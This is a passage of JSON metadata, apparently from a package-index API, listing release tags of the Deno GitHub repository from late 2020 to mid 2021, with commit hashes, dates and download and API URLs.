,"kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%